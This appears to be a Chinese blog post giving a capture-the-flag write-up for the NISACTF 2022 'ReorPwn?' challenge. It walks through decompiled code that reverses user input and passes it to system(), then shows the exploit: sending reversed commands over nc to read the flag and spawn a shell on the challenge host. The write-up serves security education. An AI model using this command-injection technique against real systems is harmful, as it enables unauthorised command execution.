热门标签
热门文章
- 12024年软件测试最新提高国内访问 GitHub 的速度的 9 种方案_github001,2024年最新软件测试开发面试题及答案_github加速 2024
- 2SpringBootWeb 篇-深入了解 Redis 五种类型命令与如何在 Java 中操作 Redis
- 3解决 Tomcat 跨域问题 - Tomcat 配置静态文件和 Java Web 服务(Spring MVC Springboot)同时允许跨域_tomcat配置跨域
- 4MySQL运维(二)MySQL分库分表概念及实战、读取分离详解_linux mysql 分库
- 5大量机器学习(Machine Learning)&深度学习(Deep Learning)资料_机器学习谁的课讲到最后
- 6记一次在ubuntu安装Mysql8修改lower_case_table_names =1的经历及最终解决方案_ubuntu已安装的mysql怎么重新初始化--lower-case-table-names=1
- 7【单片机笔记】基于XL4015的可调电源_xl4015可调降压电路图
- 8Windows安装PHP及在VScode中配置插件,使用PHP输出HelloWorld_windowsvscode php环境
- 9zookeeper知识点(一)_如何进入zk查看节点
- 10优化 CSS 代码的小技巧_html import的代替方案
当前位置: article > 正文
[NISACTF 2022]ReorPwn?
作者:小惠珠哦 | 2024-06-20 03:09:39
赞
踩
[nisactf 2022]reorpwn?
[NISACTF 2022]ReorPwn?
桌面$ checksec Re_or_pwn
[*] '/home/pwn/桌面/Re_or_pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
桌面$ ./Re_or_pwn
evcexe ot tnaw uoy tahw em lleT:
aaaa
sh: 1: aaaa: not found
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
IDA
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
puts("evcexe ot tnaw uoy tahw em lleT:");
gets((__int64)a);
fun(a);
system(a);
return 0;
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
__int64 __fastcall fun(const char *a1) { __int64 result; // rax char v2; // [rsp+17h] [rbp-9h] int i; // [rsp+18h] [rbp-8h] int v4; // [rsp+1Ch] [rbp-4h] v4 = strlen(a1); for ( i = 0; ; ++i ) { result = (unsigned int)(v4 / 2); if ( i >= (int)result ) break; v2 = a1[i]; a1[i] = a1[v4 - i - 1]; a1[v4 - i - 1] = v2; } return result; }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
假设输入a为abcd,进入fun函数之后,逻辑如下。可以发现是字符反转
a1 = abcd
v4 = 4
result = 2
v2 = a1[0] = a
a1[0] = a1[4-0-1] = a1[3] = d
a1[4-0-1] = a1[3] = a
- 1
- 2
- 3
- 4
- 5
- 6
>>> str = 'cat flag'
>>> print(str[::-1])
galf tac
- 1
- 2
- 3
EXP
直接nc
桌面$ nc node4.anna.nssctf.cn 28205
evcexe ot tnaw uoy tahw em lleT:
galf tac
NSSCTF{51e0f982-7306-48da-a5aa-ede2243a7a
- 1
- 2
- 3
- 4
或者
>>> str = '/bin/sh\x00'
>>> len(str)
8
>>> str1 = '/bin/sh'
>>> len(str1)
7
>>> print(str1[::-1])
hs/nib/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
桌面$ nc node4.anna.nssctf.cn 28205
evcexe ot tnaw uoy tahw em lleT:
hs/nib/
ls
bin
dev
flag
lib
lib32
lib64
pwn
cat flag
NSSCTF{51e0f982-7306-48da-a5aa-ede2243a7a58}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/738449
推荐阅读
相关标签
